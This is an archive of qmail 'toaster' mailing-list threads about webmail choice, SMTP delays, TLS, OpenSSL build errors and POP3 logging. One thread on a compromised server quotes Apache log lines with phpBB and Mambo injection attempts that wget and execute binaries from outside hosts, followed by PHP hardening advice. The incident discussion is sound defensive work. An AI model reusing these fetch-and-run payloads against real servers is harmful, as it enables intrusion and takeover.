[toaster] Need some advice on webmail clients
Hello, I'm looking for some advice about webmail clients. I'm still using sqwebmail because it's very lighter and accesses maildirs directly. Now I'm gonna move to a new server, and I'm looking for a new webmail client for my toaster. With more than 20,000 users accessing daily the webmail, I'm afraid the system gets very slow with a php-based client such Squirrelmail or Imp. Another solution is Openwebmail, a perl webclient that accesses maildirs directly (with a patch). So, what do you recommend ? Horde/Imp, Squirrelmail or should I sacrifice some beauty functions and use sqwebmail or openwebmail instead ? Thanks you for any support :) -- Quer um MacBook de borla ? Habilite-se em http://www.tugamail.com/mac (oferta limitada)
Re: [toaster] Need some advice on webmail clients
Thanks for the picture Bill. I'll try the Openmail, it's perl, there's a patch to access maildirs directly instead fo imap and pop3 connections, so maybe it's a good alternative to sqwebmail. - Original Message - From: Bill Shupp [EMAIL PROTECTED] To: toaster@shupp.org Sent: Saturday, September 08, 2007 2:12 AM Subject: Re: [toaster] Need some advice on webmail clients On Sep 7, 2007, at 12:14 PM, Jose wrote: -- Quer um MacBook de borla ? Habilite-se em http://www.tugamail.com/mac (oferta limitada)
[toaster] strange delay on smtp connections
Hi...I'm experiencing a problem with my smtp server: a long delay when users connects to it: [EMAIL PROTECTED] root]# telnet localhost 25 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. --- 30 - 120 seconds delay 220 domain.com ESMTP What can cause this delay ?:( I'm using smtp-auth, no rblsmtpd, no clamav, no simscan, no spamassassin... Thanks in advance for any help
Re: [toaster] strange delay on smtp connections
My qmail-smtpd/run file: #!/bin/sh QMAILDUID=`id -u vpopmail` NOFILESGID=`id -g vpopmail` MAXSMTPD=`cat /var/qmail/control/concurrencyincoming` export CHKUSER_MBXQUOTA=95 export QMAILQUEUE=/var/qmail/bin/qfilter exec /usr/local/bin/softlimit -m 2500 \ /usr/local/bin/tcpserver -v -H -R -l 0 \ -x /home/vpopmail/etc/tcp.smtp.cdb -c $MAXSMTPD \ -u $QMAILDUID -g $NOFILESGID 0 smtp \ /usr/local/bin/rblsmtpd -b -C -t5 -r dnsbl-1.uceprotect.net \ -r dnsbl.njabl.org \ -r sbl.spamhaus.org \ -r relays.ordb.org \ -r bl.spamcop.net \ -r rhsbl.sorbs.net \ -r web.dnsbl.sorbs.net \ /var/qmail/bin/qmail-smtpd \ /home/vpopmail/bin/vchkpw /bin/true 21 Thanks - Original Message - From: Rick Macdougall [EMAIL PROTECTED] To: toaster@shupp.org Sent: Thursday, January 11, 2007 3:56 PM Subject: Re: [toaster] strange delay on smtp connections Jose wrote: Hi...I'm experiencing a problem with my smtp server: a long delay when users connects to it: [EMAIL PROTECTED] root]# telnet localhost 25 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. --- 30 - 120 seconds delay 220 domain.com ESMTP What can cause this delay ?:( I'm using smtp-auth, no rblsmtpd, no clamav, no simscan, no spamassassin... Thanks in advance for any help Hi, That's usually a DNS timeout. What flags are you using with tcpserver ? Regards, Rick
Re: [toaster] strange delay on smtp connections
I believe that was the problem, everything seem to be working fine now. Thanks for your help. []'s - Original Message - From: David Earp [EMAIL PROTECTED] To: toaster@shupp.org Sent: Thursday, January 11, 2007 11:53 PM Subject: Re: [toaster] strange delay on smtp connections Rick Macdougall wrote: Carlos Solano wrote: I think relays.ordb.org is not working any more. I had the same issue, removed it and the problem was solved. Yup, you are correct and that should fix the OP's problem. Rick For information sake, ordb closed its doors on December 18, 2006 after 5 years of good/hard work. More information can be found at the provided URLs. http://www.virus.org/news/spyware/ordb-closed.html http://xbiz.com/news_piece.php?id=18748
[toaster] QmailMRTG and IMAP graphs
Hello, Is there any way to get imap, imap-ssl graphics using QmailMRTG??? The only info i get is in maillog file. Regards Juan
Re: [toaster] Toaster compromised? Or system?
and for increase security I would recommend that you set this php variables in your apache virtual host entry:php_admin_value open_basedir /path/to/domain/dir/htdocs:/path/to/other/include/dirs php_admin_value upload_tmp_dir /path/to/domain/dir/htdocs/phpuploadtmpdirThis will only allow php to open files in those directory only. If you will allow to upload files, then you should change the upload temp path to be inside one of the open_basedir directories. --Jose Canciani.On 2/10/06, Peter Maag [EMAIL PROTECTED] wrote: I would personally setup mod_security as well. It should stop most of these types of attacks right away with default settings. Peter On 2/10/06, David [EMAIL PROTECTED] wrote: Bill Shupp wrote: David wrote: Thanks Peter - reassuring to know that someone else thinks they probably didn't get root... I have been watching ps and netstat -p and haven't seen anything suspicious, nor seen any more rogue messages in my mail queue... fingers crossed :) I have plans to replace this box ASAP however. I uncovered this in the apache logs: ./www.myvirtualhost.domain-access_log: 86.35.6.242 - - [25/Jul/2005:21:32:12 +0930] GET /store/phpbb2/viewtopic.php?t=2rush=% 65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20www.cycomm.info/priv8/bin.tar.gz;tar%20xzvf%20bin.tar.gz;bin/bsh;ls%20-sa% 3B%20%65%63%68%6F%20%5F%45%4E%44%5Fhighlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%7 3%68%5D%29.%2527 HTTP/1.1 200 21138 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) looks bad, a phpbb exploit perhaps, but the date is wrong... hoping the system weathered that one. Closer to date is: ./myvirtualhost.domain-error_log:[Sun Jan 15 22:51:53 2006] [error] [client 85.214.20.161] request failed: erroneous characters aft er protocol string: GET /php/mambo/index2.php?_REQUEST[option]=com_content_REQUEST[Itemid]=1GLOBALS=mosConfig_absolute_path=http: //209.136.48.69/cmd.gif?cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\\x01.1 But it looks like that one failed. Oh well time to update php and clean out a few old phpbb installs. Thanks all for your help. David A few things I always run into with PHP that are popular: 1) Make sure PHPBB is the latest version and not exploitable.I used to allow my clients to install it, but every few months, SOMEONE would install an old exploitable version.I've switched to using debian's PHPBB package, and just point clients to it so I don't have to keep track of it anymore.I just run security updates daily instead on all packages.Haven't been exploited since. 2) Keep register_globals off, and only turn it on as needed. 3) Make sure allow_url_fopen is set to OFF.This is a very popular one, and in my experience tends to attract DDoS attackes rather than a mail exploit.But costs you expensive bandwitdth nonetheless. Regards, Bill !DSPAM:43ecbcde224031625613092!Cheers Bill, register_globals always off, but now I will probably disable url file operations too. Perhaps just enable them on a per-sitesettingDavid
[toaster] TLS debugging
Greetings all, Im trying to understand a little bit more about the qmail-tls.patch. Reading the initial documentation Frederic, he names a DEBUG option for further logging information, but I dont know where to invoke this option. Could someone tell me how? Thanks in advanced, Juan
[toaster] vchkpw-smtp user not found
Greetings all, I've been following this toaster instructions. But when I try to connect from a mail client (OE6) the mail log shows the following line: vpopmail[13281]: vchkpw-smtp: vpopmail user not found [EMAIL PROTECTED]:IP where [EMAIL PROTECTED] is an authorized user an IP: is just my client IP. By the other side, my imaps woks fine with the same user. imapd-ssl: Connection, ip=[:::...] imapd-ssl: LOGIN, [EMAIL PROTECTED], ip=[:::.], protocol=IMAP Could anyone give me some advise, or directions to work on this problem. Thanks in advanced. Juan José
[toaster] openssl-0.9.8a dso_dlfcn.c: undefined reference to `dlopen'
Hello,I'm trying to install this guide with the openssl-0.9.8 release. First I got the error mentioned in the thread [toaster] tls.c:12: conflicting types for `strerror' Bruno Negrao . After I got over this declaration error I'm getting the following output:./load qmail-remote control.o constmap.o timeoutread.o \timeoutwrite.o timeoutconn.o tcpto.o now.o dns.o ip.o \tls.o ssl_timeoutio.o -L/usr/local/ssl/lib -lssl -lcrypto \ipalloc.o strsalloc.o ipme.o quote.o ndelay.a case.a sig.a open.a \lock.a seek.a getln.a stralloc.a alloc.a substdio.a error.a \str.a fs.a auto_qmail.o `cat dns.lib` `cat socket.lib`/usr/local/ssl/lib/libcrypto.a(dso_dlfcn.o)(.text+0x63): En la función `dlfcn_load':dso_dlfcn.c: undefined reference to `dlopen'/usr/local/ssl/lib/libcrypto.a(dso_dlfcn.o)(.text+0xc5):dso_dlfcn.c: undefined reference to `dlclose'/usr/local/ssl/lib/libcrypto.a(dso_dlfcn.o)(.text+0xf4):dso_dlfcn.c: undefined reference to `dlerror'/usr/local/ssl/lib/libcrypto.a(dso_dlfcn.o)(.text+0x1a7): En la función `dlfcn_unload':dso_dlfcn.c: undefined reference to `dlclose'/usr/local/ssl/lib/libcrypto.a(dso_dlfcn.o)(.text+0x27d): En la función `dlfcn_bind_var':dso_dlfcn.c: undefined reference to `dlsym'/usr/local/ssl/lib/libcrypto.a(dso_dlfcn.o)(.text+0x2f9):dso_dlfcn.c: undefined reference to `dlerror'/usr/local/ssl/lib/libcrypto.a(dso_dlfcn.o)(.text+0x380): En la función `dlfcn_bind_func':dso_dlfcn.c: undefined reference to `dlsym'/usr/local/ssl/lib/libcrypto.a(dso_dlfcn.o)(.text+0x406):dso_dlfcn.c: undefined reference to `dlerror'collect2: ld devolvió el estado de salida 1make: *** [qmail-remote] Error 1but I don't know how to face this Libcrypto references.Anyone of you know what to do.ThanksJuan Jose
Re: [toaster] Toaster 0.7b1
I would add these two optional things to the toaster: * reject known-abuse mail servers: add /usr/bin/rblsmtpd r antispamserver \ to /var/qmail/control/conf-smtpd/run just before the call to /var/qmail/bin/qmail-smtpd replacing antispamserver with something like sbl.spamhaus.org. * enable per-domain config for simscan: add --enable-per-domain=y to the configure options and run this after install: # default options echo :clam=yes,spam=yes,trophie=yes,spam_hits=20.1 /var/qmail/control/simcontrol # recreate perdomain options database /var/qmail/bin/simscanmk What do you think? Jose. On Fri, 17 Dec 2004 13:58:37 +0100, Eduardo Cortés [EMAIL PROTECTED] wrote: Update the changelog on qmail-toaster-0.7b5.patch.bz2. At the begining you can read: chkuser 2.0.7 by Antonio Nati and should be 2.0.8 Regards, Eduardo Cortés El Jueves, 16 de Diciembre de 2004 19:11, Bill Shupp escribió: All, I posted a beta version of toaster 0.7 here: http://shupp.org/toaster/beta.php It includes a new version of the qmail-toaster patch, 0.7b5 with chkuser 2.0.8 (0.7b4 had chkuser 2.0.7, which was rejecting null senders). All software versions are up to date. Also added under options are SpamAssassin (site-wide), ClamAV, ripmime, and simscan. Please help test if you have a chance, and report any issues/suggestions/glaring omissions to this list. I'm running this patch on 3 production servers, and do not have any problems. Regards, Bill Shupp -- Ing. Jose Luis Canciani Ingeniero en Sistemas de Información This message was sent using IMP, the Internet Messaging Program.
Re: [toaster] Toaster 0.7b1
I would add these two optional things to the toaster: * reject known-abuse mail servers: add /usr/bin/rblsmtpd r antispamserver \ to /var/qmail/control/conf-smtpd/run just before the call to /var/qmail/bin/qmail-smtpd replacing antispamserver with something like sbl.spamhaus.org. * enable per-domain config for simscan: add --enable-per-domain=y to the configure options and run this after install: # default options echo :clam=yes,spam=yes,trophie=yes,spam_hits=20.1 /var/qmail/control/simcontrol # recreate perdomain options database /var/qmail/bin/simscanmk What do you think? Jose. On Thu, 16 Dec 2004 11:36:38 -0800, Bill Shupp [EMAIL PROTECTED] wrote: Neil wrote: Hello Bill, Does the chkusr 2.0.8 work with vpopmail+mysql? Best, Neil Yeah. The Makefile now includes inc_deps and lib_deps from ~vpopmail/etc, so a separate mysql patch is no longer necessary to link properly. It's dynamic. Regards, Bill -- Ing. Jose Luis Canciani Ingeniero en Sistemas de Información This message was sent using IMP, the Internet Messaging Program.
Re: [toaster] pop3 logging
Thanks for your answers Bob. Unfortunatly I'm not using LDAP... But I've seen some logs of the POP3 Server that comes with Courier package and it seems they have what I need: username and bytes transferred. If I can make it work, I'll post the scripts to get the bandwidth per domain. Thanks again! -- Jose Canciani. On Wed, 8 Dec 2004 18:10:06 +, Bob Hutchinson [EMAIL PROTECTED] wrote: On Wednesday 08 December 2004 12:29, Jose Luis Canciani wrote: The problem is that isoqlog will not analyze qmail-pop3d logs, only qmail-send logs. And even if it could, the pop3 logs does not show username and/or size of downloaded messages, it only shows ip and ports used by the connections. yep That's why I first asked about the POP3_LOGLEVEL parameter that I think it could be set to show this kind of data in the logs. I found this on http://www.nrg4u.com/qmail/QLDAPINSTALL Environment variables setable via tcpserver, envdir or plain old env/sh: snip POP3_LOGLEVEL Level of log verbosity in qmail-pop3d. Default: 0 (NULL) Affects: qmail-pop3d Example: 3 Levels: 0 = no logging 1 = fatal errors 2 = login/logout accounting 3 = session errors 4 = verbose Note: integer value, everything will be logged through tcpserver Note2: this is a hack so that this log level does not interfere with the one of auth_pop. This would appear to be a qmail-ldap specific thing, no mention of it in man qmail-pop3d (netqmail-1.05) nor can I find any reference to POP3_LOGLEVEL in my source tree, which is stock toaster If you are running qmail-ldap try setting environment variable as above Nobody is collecting pop3 bandwidth size on a per domain basis?? On Tuesday 07 December 2004 22:22, Jose Luis Canciani wrote: Thanks for the info. One doubt only, are those graphs separated by domain? I mean, if I have several domains in vpopmail, will qmail-mrtg give me the bandwidth for each one? No, qmail-mrtg does not, but isoqlog will, per domain and per user, but no graphs as it stands. qmail-mrtg will show you traffic, and can be configured to send alerts if trigger points are breached, alerting you to yet another tsunami of spam. - Hide quoted text - On Wed, 8 Dec 2004 00:23:20 +, Bob Hutchinson [EMAIL PROTECTED] wrote: On Tuesday 07 December 2004 20:06, Jose Luis Canciani wrote: Hi everybody. I'm creating a platform for a hosting service and I need to know how much bandwidth each domain is consuming. I've partially managed to do it reading isoqlog reporting (based on qmail-send logs). Now I'm trying to find POP3 bandwidth for qmail-pop3d. I haven't found too much information on the internet. On the qmail-ldap big picture a parameter called POP3_LOGLEVEL is shown. Searching with that keyword, google show me only a couple of mailling list messages, one of those suggest to put POP3_LOGLEVEL=3 so that qmail-pop3 would show the username of the person. So I've added POP3_LOGLEVEL=3; export POP3_LOGLEVEL to /var/qmail/supervise/qmail-pop3d/run and restarted pop3 service but nothing has changed. Does anyone know something about this parameter o something else that would help? I haven't tried courier pop3 server, maybe someone could tell me if it could be configured for what I need? isoqlog will give you daily figures, in and out for each user, very easy to install. awstats can be configured to use qmail logs and will give greater detail, but it's not so easy to setup qmail-mrtg from inter7 is also useful for (almost) realtime graphs so is logwatch, for daily reports. There is an addon to logwatch 5.1 at http://midwales.com/downloads/logwatch/logwatch-qmail-1.0.3.tar.gz and don't forget iptables Thank you! -- Jose Luis Canciani Ing. en Sistemas de Informacion. This message was sent using IMP, the Internet Messaging Program. -- - Bob Hutchinson Midwales dot com - -- - Bob Hutchinson Midwales dot com - This message was sent using IMP, the Internet Messaging Program. This message was sent using IMP, the Internet Messaging Program. -- - Bob Hutchinson Midwales dot com - This message was sent using IMP, the Internet Messaging Program.
Re: [toaster] pop3 logging
The problem is that isoqlog will not analyze qmail-pop3d logs, only qmail-send logs. And even if it could, the pop3 logs does not show username and/or size of downloaded messages, it only shows ip and ports used by the connections. That's why I first asked about the POP3_LOGLEVEL parameter that I think it could be set to show this kind of data in the logs. Nobody is collecting pop3 bandwidth size on a per domain basis?? On Tuesday 07 December 2004 22:22, Jose Luis Canciani wrote: Thanks for the info. One doubt only, are those graphs separated by domain? I mean, if I have several domains in vpopmail, will qmail-mrtg give me the bandwidth for each one? No, qmail-mrtg does not, but isoqlog will, per domain and per user, but no graphs as it stands. qmail-mrtg will show you traffic, and can be configured to send alerts if trigger points are breached, alerting you to yet another tsunami of spam. - Hide quoted text - On Wed, 8 Dec 2004 00:23:20 +, Bob Hutchinson [EMAIL PROTECTED] wrote: On Tuesday 07 December 2004 20:06, Jose Luis Canciani wrote: Hi everybody. I'm creating a platform for a hosting service and I need to know how much bandwidth each domain is consuming. I've partially managed to do it reading isoqlog reporting (based on qmail-send logs). Now I'm trying to find POP3 bandwidth for qmail-pop3d. I haven't found too much information on the internet. On the qmail-ldap big picture a parameter called POP3_LOGLEVEL is shown. Searching with that keyword, google show me only a couple of mailling list messages, one of those suggest to put POP3_LOGLEVEL=3 so that qmail-pop3 would show the username of the person. So I've added POP3_LOGLEVEL=3; export POP3_LOGLEVEL to /var/qmail/supervise/qmail-pop3d/run and restarted pop3 service but nothing has changed. Does anyone know something about this parameter o something else that would help? I haven't tried courier pop3 server, maybe someone could tell me if it could be configured for what I need? isoqlog will give you daily figures, in and out for each user, very easy to install. awstats can be configured to use qmail logs and will give greater detail, but it's not so easy to setup qmail-mrtg from inter7 is also useful for (almost) realtime graphs so is logwatch, for daily reports. There is an addon to logwatch 5.1 at http://midwales.com/downloads/logwatch/logwatch-qmail-1.0.3.tar.gz and don't forget iptables Thank you! -- Jose Luis Canciani Ing. en Sistemas de Informacion. This message was sent using IMP, the Internet Messaging Program. -- - Bob Hutchinson Midwales dot com - -- - Bob Hutchinson Midwales dot com - This message was sent using IMP, the Internet Messaging Program. This message was sent using IMP, the Internet Messaging Program.
[toaster] pop3 logging
Hi everybody. I'm creating a platform for a hosting service and I need to know how much bandwidth each domain is consuming. I've partially managed to do it reading isoqlog reporting (based on qmail-send logs). Now I'm trying to find POP3 bandwidth for qmail-pop3d. I haven't found too much information on the internet. On the qmail-ldap big picture a parameter called POP3_LOGLEVEL is shown. Searching with that keyword, google show me only a couple of mailling list messages, one of those suggest to put POP3_LOGLEVEL=3 so that qmail-pop3 would show the username of the person. So I've added POP3_LOGLEVEL=3; export POP3_LOGLEVEL to /var/qmail/supervise/qmail-pop3d/run and restarted pop3 service but nothing has changed. Does anyone know something about this parameter o something else that would help? I haven't tried courier pop3 server, maybe someone could tell me if it could be configured for what I need? Thank you! -- Jose Luis Canciani Ing. en Sistemas de Informacion. This message was sent using IMP, the Internet Messaging Program.
Re: [toaster] smtp server problem
did you try disabling the check for a dns entry on the sender (mfcheck)? echo 0 /var/qmail/control/mfcheck On Thu, 25 Nov 2004 22:46:36 +0200, yc [EMAIL PROTECTED] wrote: Hi, I have a toaster mailbox (using toaster 0.6). Nowadays my users complain about sending mail. Mail server accept mail very late. About 10-20 seconds. I look the qmail logs, but can not see any interesting log. Do you have any suggestion to find the problem. Any comment is welcome. thanks for your helps, Y.C -- Ing. Jose Luis Canciani Ingeniero en Sistemas de Información This message was sent using IMP, the Internet Messaging Program.